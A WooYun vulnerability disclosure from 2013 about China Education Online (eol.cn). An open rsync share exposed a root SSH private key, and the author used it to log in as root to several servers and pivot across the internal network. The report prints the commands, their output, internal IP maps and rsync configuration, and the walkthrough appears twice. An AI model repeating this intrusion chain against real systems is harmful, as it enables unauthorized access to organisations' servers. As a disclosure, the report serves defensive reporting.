中国教育网系统配置漏洞导致全站沦陷

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041184

漏洞标题：中国教育网系统配置漏洞导致全站沦陷

漏洞作者：盈盈无绪

提交时间：2013-10-27 15:12

修复时间：2013-12-11 15:13

公开时间：2013-12-11 15:13

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-10-27：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-12-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

中国教育网 www.eol.cn 由于1个服务的配置错误导致全站沦陷

详细说明：

rsync 211.151.94.241::gen/

cat hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1       localhost
202.205.109.141 debian141.eol.cn        debian141
# The following lines are desirable for IPv6 capable hosts
# ::1     ip6-localhost ip6-loopback
# fe00::0 ip6-localnet
# ff00::0 ip6-mcastprefix
# ff02::1 ip6-allnodes
# ff02::2 ip6-allrouters
# ff02::3 ip6-allhosts
#
# 211.151.91.98           ipvs2
#
166.111.204.69		wowowo
172.16.0.1		switch-01
172.16.0.2		switch-02
172.16.0.3		switch-03
172.16.1.4		switch-04
202.112.0.36		kiwi
67.228.174.9            cucas
#202.205.109.1		rhea
202.205.109.2		www.eol.cn
202.205.109.3		bbs
202.205.109.4		db2.eol.cn
202.205.109.5		jacana
202.205.109.6		butterfly	db2
#202.205.109.7		db1
#202.205.109.8		bull
202.205.109.8		crane
202.205.109.9		ibis
202.205.109.10		centra-2
202.205.109.11		donkey2
202.205.109.12		centra
202.205.109.14		home
202.205.109.15		deepblue
202.205.109.17		Ian
202.205.109.18		thorpe
202.205.109.19		blue
202.205.109.20		blog.edu.cn
202.205.109.21		caps-2
202.205.109.22		home2
202.205.109.23		bluebird
202.205.109.24		ceaie.edu.cn	blog-2
202.205.109.25		egret
202.205.109.26		thorpe-2
202.205.109.27		blog
202.205.109.28		gaokao4
202.205.109.34		ad01
202.205.109.35		ad02
202.205.109.37		caps
202.205.109.38		ftp		snoopy
#202.205.109.45		hehe
202.205.109.46		gaokao4
202.205.109.47		home-limo
202.205.109.48		eolftp
202.205.109.50		node14
202.205.109.51	        eagle
202.205.109.52	        crane
202.205.109.53		emu
202.205.109.54		donkey
202.205.109.55		bittern
202.205.109.56		pause
202.205.109.57		egret-2
202.205.109.58		kookaburra
202.205.109.59		macaw
202.205.109.69		db1
202.205.109.80	        bigip
202.205.109.97		honeyyeater
202.205.109.98		jay
202.205.109.99		preview.eol.cn
202.205.109.100		flamingo
202.205.109.101		flamingo-2
202.205.109.102		preview.eol.cn
202.205.109.103	        flycatcher
202.205.109.104		falcon
202.205.109.110		goose
202.205.109.111		hawk
202.205.109.112		heron
202.205.109.117		dove
202.205.109.118		e2900-1
202.205.109.119		e2900-2
202.205.109.120		v240-1
202.205.109.121		v240-2
202.205.109.123		hummingbird
202.205.109.124		hornbill
202.205.109.125		bluelog
202.205.109.127		boatbill
202.205.109.150		bull
202.205.109.155		lion
202.205.109.178         rhea
202.205.109.184	        merganser
202.205.109.190	        marabou
202.205.109.191	        mallard
202.205.109.193	        motmot
202.205.109.195	        philomela
202.205.109.209		msu
202.205.11.9		break		dns2
202.205.11.42		giraffe
202.205.11.43		snake
202.205.11.69		green
202.205.11.70		cyan
202.205.11.71		kingfisher
202.205.11.72		kingfisher-2
202.205.176.34          moeweb1
202.108.198.242         cvae
202.205.7.57		gsy.idc
202.205.7.58		idcmonitor
211.151.91.97		Ian2
211.151.91.98		ipvs2
211.151.91.101		ipvs1
211.151.91.102		alt2
211.151.91.103		gaokao2
211.151.91.104		bbs2
#211.151.91.105		photo
211.157.99.55           photonew
202.205.109.210		photo
211.151.91.107		free.eol.cn-2
211.151.91.108		www.eol.cn-2
#chisa.edu.cn
211.151.90.1		media
211.151.90.2		media
211.151.90.3		chisaiflow
211.151.90.4		fangtan
211.151.90.5		realserver
211.151.89.145		chisachat
211.151.89.185		chisa-db
211.151.89.188		magpie
202.112.35.245          hehe
211.142.41.140          dtmy

发现一个ssh.tgz的文件

164713 10 27 14:01 ssh2.tgz

解压缩

id_rsa		id_rsa.pub

在上面的服务器里面选一个登陆

ssh -i id_rsa root@211.151.91.104
ipvs2:~# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2007 ?        00:03:51 init [2]
root         2     1  0  2007 ?        00:04:34 [migration/0]
root         3     1  0  2007 ?        00:01:14 [ksoftirqd/0]
root         4     1  0  2007 ?        00:04:25 [migration/1]
ipvs2:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:C0:9F:38:C1:95
          inet addr:211.151.91.98  Bcast:211.151.91.111  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1915675700 errors:5 dropped:144 overruns:0 frame:3
          TX packets:3921889199 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2378780214 (2.2 GiB)  TX bytes:1560078143 (1.4 GiB)
          Base address:0xe400 Memory:febc0000-febe0000
eth1      Link encap:Ethernet  HWaddr 00:C0:9F:38:C1:96
          inet addr:10.0.0.98  Bcast:10.0.0.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:495776699 errors:0 dropped:180 overruns:0 frame:0
          TX packets:3661157267 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:849113923 (809.7 MiB)  TX bytes:1267393581 (1.1 GiB)
          Base address:0xe000 Memory:feba0000-febc0000
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:196550863 errors:0 dropped:0 overruns:0 frame:0
          TX packets:196550863 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:117126749 (111.7 MiB)  TX bytes:117126749 (111.7 MiB)
history | grep ssh
    5  ssh 10.0.0.39
    6  ssh 10.0.0.43
    8  ssh 10.0.0.43
   10  ssh 10.0.0.39
   11  ssh 10.0.0.43
   12  ssh 10.0.0.39
   14  ssh 10.0.0.43
ssh 10.0.0.39
Last login: Sun Sep 29 11:17:10 2013 from 10.0.0.98
Linux cockatoo 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cockatoo:~# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2009 ?        00:07:12 init [2]
root         2     1  0  2009 ?        00:00:00 [migration/0]
root         3     1  0  2009 ?        00:00:10 [ksoftirqd/0]
root         4     1  0  2009 ?        00:01:13 [migration/1]
root         5     1  0  2009 ?        00:01:37 [ksoftirqd/1]
cockatoo:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:35:3C:2B:E4
          inet addr:10.0.0.39  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80::216:35ff:fe3c:2be4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2782554477 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1741093814 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:344340646 (328.3 MiB)  TX bytes:86728051 (82.7 MiB)
          Interrupt:201
eth0:0    Link encap:Ethernet  HWaddr 00:16:35:3C:2B:E4
          inet addr:10.0.0.47  Bcast:10.0.0.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:201
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:36885 errors:0 dropped:0 overruns:0 frame:0
          TX packets:36885 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:13680105 (13.0 MiB)  TX bytes:13680105 (13.0 MiB)
有个rsyncd.conf
[wcmback]
        path = /home/wcmback
        comment = Apache2 Config Files
        hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 202.205.109.119
[site]
        path = /etc/apache2/sites-enabled
       comment = Apache2 Config Files
        hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25
[teacher]
        path = /home/wcm/edu_cn/jiao_shi_zhao_pin_1582
        comment = Whole www htdocs
        hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[conf]
        path = /home/ftp_test/conf
        comment = Whole www htdocs
        hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[new_files]
	path=/home/wcm/new_files
	comment = eol wcm files
	ignore errors = yes
	read only = no
	hosts allow = 10.0.0.142/32 10.0.0.143/32
[eol_cn]
        path=/home/wcm/eol_cn
        comment = eol wcm files
        ignore errors = yes
        read only = no
        hosts allow = 10.0.0.142/32 10.0.0.143/32
[new_files_images]
        path=/home/wcm/new_files/images/cer.net/gaokao/2011shiti
        comment = eol wcm files
        ignore errors = yes
        read only = no
        hosts allow = 10.0.0.142/32 10.0.0.143/32
[new_files_zt]
        path=/home/wcm/new_files/zt
        comment = eol wcm files
        ignore errors = yes
        read only = no
        hosts allow = 10.0.0.142/32 10.0.0.143/32
cockatoo:/home/wcm# cd eol_cn/
cockatoo:/home/wcm/eol_cn# ls
04_bys_zhao_pin_4407					   fudao_10487			     lanqiu_11735				te_jian_3992
04_xiaoyuan_cj_1978					   fudao_10499			     lao_dong_fa_yuan_4385			team_2012
04chun_jie_kuai_xun_1975				   fudao_10511			     lao_dong_he_tong_9642			teams_5149
04chun_jie_zhuan_ti_1974				   fudao_10522			     lao_dong_he_tong_jie_chu_zhong_zhi_4391	tebie_ch_4107
05_10_2267						   fudao_10533			     lao_dong_he_tong_qian_ding_bian_geng_4392	tebie_ch_4520
05_11_2268						   fudao_10547			     laow_1889					tepjs_4440

再换个机器试试

ssh -i i 121.194.3.201
Last login: Sun Oct 27 14:52:07 2013 from 202.205.109.80
Linux xinxi2009-01 2.6.18-6-amd64 #1 SMP Sun Feb 10 17:50:19 UTC 2008 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
xinxi2009-01:~# ifconfig
eth2      Link encap:Ethernet  HWaddr 00:23:8B:A9:AA:10
          inet addr:121.194.3.201  Bcast:121.194.3.255  Mask:255.255.255.0
          inet6 addr: fe80::223:8bff:fea9:aa10/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11859164102 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15624895490 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:1655586719825 (1.5 TiB)  TX bytes:19411809874839 (17.6 TiB)
          Base address:0xac00 Memory:fcde0000-fce00000
eth3      Link encap:Ethernet  HWaddr 00:23:8B:A9:AA:11
          inet addr:118.186.63.12  Bcast:118.186.63.127  Mask:255.255.255.128
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:98621 errors:0 dropped:0 overruns:0 frame:0
          TX packets:27891 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:8199957 (7.8 MiB)  TX bytes:18628920 (17.7 MiB)
          Base address:0xa800 Memory:fcd80000-fcda0000
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:17767291494 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17767291494 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:43181600100598 (39.2 TiB)  TX bytes:43181600100598 (39.2 TiB)
xinxi2009-01:~# id
uid=0(root) gid=0(root) groups=0(root)

问题太严重了，不继续了。

漏洞证明：

rsync 211.151.94.241::gen/

cat hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1       localhost
202.205.109.141 debian141.eol.cn        debian141
# The following lines are desirable for IPv6 capable hosts
# ::1     ip6-localhost ip6-loopback
# fe00::0 ip6-localnet
# ff00::0 ip6-mcastprefix
# ff02::1 ip6-allnodes
# ff02::2 ip6-allrouters
# ff02::3 ip6-allhosts
#
# 211.151.91.98           ipvs2
#
166.111.204.69		wowowo
172.16.0.1		switch-01
172.16.0.2		switch-02
172.16.0.3		switch-03
172.16.1.4		switch-04
202.112.0.36		kiwi
67.228.174.9            cucas
#202.205.109.1		rhea
202.205.109.2		www.eol.cn
202.205.109.3		bbs
202.205.109.4		db2.eol.cn
202.205.109.5		jacana
202.205.109.6		butterfly	db2
#202.205.109.7		db1
#202.205.109.8		bull
202.205.109.8		crane
202.205.109.9		ibis
202.205.109.10		centra-2
202.205.109.11		donkey2
202.205.109.12		centra
202.205.109.14		home
202.205.109.15		deepblue
202.205.109.17		Ian
202.205.109.18		thorpe
202.205.109.19		blue
202.205.109.20		blog.edu.cn
202.205.109.21		caps-2
202.205.109.22		home2
202.205.109.23		bluebird
202.205.109.24		ceaie.edu.cn	blog-2
202.205.109.25		egret
202.205.109.26		thorpe-2
202.205.109.27		blog
202.205.109.28		gaokao4
202.205.109.34		ad01
202.205.109.35		ad02
202.205.109.37		caps
202.205.109.38		ftp		snoopy
#202.205.109.45		hehe
202.205.109.46		gaokao4
202.205.109.47		home-limo
202.205.109.48		eolftp
202.205.109.50		node14
202.205.109.51	        eagle
202.205.109.52	        crane
202.205.109.53		emu
202.205.109.54		donkey
202.205.109.55		bittern
202.205.109.56		pause
202.205.109.57		egret-2
202.205.109.58		kookaburra
202.205.109.59		macaw
202.205.109.69		db1
202.205.109.80	        bigip
202.205.109.97		honeyyeater
202.205.109.98		jay
202.205.109.99		preview.eol.cn
202.205.109.100		flamingo
202.205.109.101		flamingo-2
202.205.109.102		preview.eol.cn
202.205.109.103	        flycatcher
202.205.109.104		falcon
202.205.109.110		goose
202.205.109.111		hawk
202.205.109.112		heron
202.205.109.117		dove
202.205.109.118		e2900-1
202.205.109.119		e2900-2
202.205.109.120		v240-1
202.205.109.121		v240-2
202.205.109.123		hummingbird
202.205.109.124		hornbill
202.205.109.125		bluelog
202.205.109.127		boatbill
202.205.109.150		bull
202.205.109.155		lion
202.205.109.178         rhea
202.205.109.184	        merganser
202.205.109.190	        marabou
202.205.109.191	        mallard
202.205.109.193	        motmot
202.205.109.195	        philomela
202.205.109.209		msu
202.205.11.9		break		dns2
202.205.11.42		giraffe
202.205.11.43		snake
202.205.11.69		green
202.205.11.70		cyan
202.205.11.71		kingfisher
202.205.11.72		kingfisher-2
202.205.176.34          moeweb1
202.108.198.242         cvae
202.205.7.57		gsy.idc
202.205.7.58		idcmonitor
211.151.91.97		Ian2
211.151.91.98		ipvs2
211.151.91.101		ipvs1
211.151.91.102		alt2
211.151.91.103		gaokao2
211.151.91.104		bbs2
#211.151.91.105		photo
211.157.99.55           photonew
202.205.109.210		photo
211.151.91.107		free.eol.cn-2
211.151.91.108		www.eol.cn-2
#chisa.edu.cn
211.151.90.1		media
211.151.90.2		media
211.151.90.3		chisaiflow
211.151.90.4		fangtan
211.151.90.5		realserver
211.151.89.145		chisachat
211.151.89.185		chisa-db
211.151.89.188		magpie
202.112.35.245          hehe
211.142.41.140          dtmy

发现一个ssh.tgz的文件

164713 10 27 14:01 ssh2.tgz

解压缩

id_rsa		id_rsa.pub

在上面的服务器里面选一个登陆

ssh -i id_rsa root@211.151.91.104
ipvs2:~# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2007 ?        00:03:51 init [2]
root         2     1  0  2007 ?        00:04:34 [migration/0]
root         3     1  0  2007 ?        00:01:14 [ksoftirqd/0]
root         4     1  0  2007 ?        00:04:25 [migration/1]
ipvs2:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:C0:9F:38:C1:95
          inet addr:211.151.91.98  Bcast:211.151.91.111  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1915675700 errors:5 dropped:144 overruns:0 frame:3
          TX packets:3921889199 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2378780214 (2.2 GiB)  TX bytes:1560078143 (1.4 GiB)
          Base address:0xe400 Memory:febc0000-febe0000
eth1      Link encap:Ethernet  HWaddr 00:C0:9F:38:C1:96
          inet addr:10.0.0.98  Bcast:10.0.0.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:495776699 errors:0 dropped:180 overruns:0 frame:0
          TX packets:3661157267 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:849113923 (809.7 MiB)  TX bytes:1267393581 (1.1 GiB)
          Base address:0xe000 Memory:feba0000-febc0000
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:196550863 errors:0 dropped:0 overruns:0 frame:0
          TX packets:196550863 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:117126749 (111.7 MiB)  TX bytes:117126749 (111.7 MiB)
history | grep ssh
    5  ssh 10.0.0.39
    6  ssh 10.0.0.43
    8  ssh 10.0.0.43
   10  ssh 10.0.0.39
   11  ssh 10.0.0.43
   12  ssh 10.0.0.39
   14  ssh 10.0.0.43
ssh 10.0.0.39
Last login: Sun Sep 29 11:17:10 2013 from 10.0.0.98
Linux cockatoo 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cockatoo:~# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2009 ?        00:07:12 init [2]
root         2     1  0  2009 ?        00:00:00 [migration/0]
root         3     1  0  2009 ?        00:00:10 [ksoftirqd/0]
root         4     1  0  2009 ?        00:01:13 [migration/1]
root         5     1  0  2009 ?        00:01:37 [ksoftirqd/1]
cockatoo:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:35:3C:2B:E4
          inet addr:10.0.0.39  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80::216:35ff:fe3c:2be4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2782554477 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1741093814 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:344340646 (328.3 MiB)  TX bytes:86728051 (82.7 MiB)
          Interrupt:201
eth0:0    Link encap:Ethernet  HWaddr 00:16:35:3C:2B:E4
          inet addr:10.0.0.47  Bcast:10.0.0.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:201
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:36885 errors:0 dropped:0 overruns:0 frame:0
          TX packets:36885 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:13680105 (13.0 MiB)  TX bytes:13680105 (13.0 MiB)
有个rsyncd.conf
[wcmback]
        path = /home/wcmback
        comment = Apache2 Config Files
        hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 202.205.109.119
[site]
        path = /etc/apache2/sites-enabled
       comment = Apache2 Config Files
        hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25
[teacher]
        path = /home/wcm/edu_cn/jiao_shi_zhao_pin_1582
        comment = Whole www htdocs
        hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[conf]
        path = /home/ftp_test/conf
        comment = Whole www htdocs
        hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[new_files]
	path=/home/wcm/new_files
	comment = eol wcm files
	ignore errors = yes
	read only = no
	hosts allow = 10.0.0.142/32 10.0.0.143/32
[eol_cn]
        path=/home/wcm/eol_cn
        comment = eol wcm files
        ignore errors = yes
        read only = no
        hosts allow = 10.0.0.142/32 10.0.0.143/32
[new_files_images]
        path=/home/wcm/new_files/images/cer.net/gaokao/2011shiti
        comment = eol wcm files
        ignore errors = yes
        read only = no
        hosts allow = 10.0.0.142/32 10.0.0.143/32
[new_files_zt]
        path=/home/wcm/new_files/zt
        comment = eol wcm files
        ignore errors = yes
        read only = no
        hosts allow = 10.0.0.142/32 10.0.0.143/32
cockatoo:/home/wcm# cd eol_cn/
cockatoo:/home/wcm/eol_cn# ls
04_bys_zhao_pin_4407					   fudao_10487			     lanqiu_11735				te_jian_3992
04_xiaoyuan_cj_1978					   fudao_10499			     lao_dong_fa_yuan_4385			team_2012
04chun_jie_kuai_xun_1975				   fudao_10511			     lao_dong_he_tong_9642			teams_5149
04chun_jie_zhuan_ti_1974				   fudao_10522			     lao_dong_he_tong_jie_chu_zhong_zhi_4391	tebie_ch_4107
05_10_2267						   fudao_10533			     lao_dong_he_tong_qian_ding_bian_geng_4392	tebie_ch_4520
05_11_2268						   fudao_10547			     laow_1889					tepjs_4440

再换个机器试试

ssh -i i 121.194.3.201
Last login: Sun Oct 27 14:52:07 2013 from 202.205.109.80
Linux xinxi2009-01 2.6.18-6-amd64 #1 SMP Sun Feb 10 17:50:19 UTC 2008 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
xinxi2009-01:~# ifconfig
eth2      Link encap:Ethernet  HWaddr 00:23:8B:A9:AA:10
          inet addr:121.194.3.201  Bcast:121.194.3.255  Mask:255.255.255.0
          inet6 addr: fe80::223:8bff:fea9:aa10/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11859164102 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15624895490 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:1655586719825 (1.5 TiB)  TX bytes:19411809874839 (17.6 TiB)
          Base address:0xac00 Memory:fcde0000-fce00000
eth3      Link encap:Ethernet  HWaddr 00:23:8B:A9:AA:11
          inet addr:118.186.63.12  Bcast:118.186.63.127  Mask:255.255.255.128
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:98621 errors:0 dropped:0 overruns:0 frame:0
          TX packets:27891 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:8199957 (7.8 MiB)  TX bytes:18628920 (17.7 MiB)
          Base address:0xa800 Memory:fcd80000-fcda0000
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:17767291494 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17767291494 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:43181600100598 (39.2 TiB)  TX bytes:43181600100598 (39.2 TiB)
xinxi2009-01:~# id
uid=0(root) gid=0(root) groups=0(root)

问题太严重了，不继续了。

修复方案：

安全需要很小心

版权声明：转载请注明来源盈盈无绪@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

2013-10-28 07:55 | 雷锋小号 ( 路人 | 还没有发布任何漏洞 | 乌云现在就缺我这种默默顶贴从来不求脸熟的...)

前排。目测会火
2013-10-28 22:04 | 盈盈无绪 ( 实习白帽子 | Rank:44 漏洞数:14 | 此人很懒)

能给帮忙把厂商改成中国教育在线吗....它们在这里貌似用那个账号。
2013-12-11 17:48 | 麻花藤 ( 路人 | Rank:15 漏洞数:1 | ด้้้้้็็็็็้้้้้็็็็...)

文章略长、、、、不过问题蛮严重、、、、不过天朝还不管、、、、

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041184

漏洞标题：中国教育网系统配置漏洞导致全站沦陷

相关厂商：中国教育网

漏洞作者：盈盈无绪

提交时间：2013-10-27 15:12

修复时间：2013-12-11 15:13

公开时间：2013-12-11 15:13

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源盈盈无绪@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041184

漏洞标题：中国教育网系统配置漏洞导致全站沦陷

相关厂商：中国教育网

漏洞作者： 盈盈无绪

提交时间：2013-10-27 15:12

修复时间：2013-12-11 15:13

公开时间：2013-12-11 15:13

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-041184"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 盈盈无绪@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：盈盈无绪

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源盈盈无绪@乌云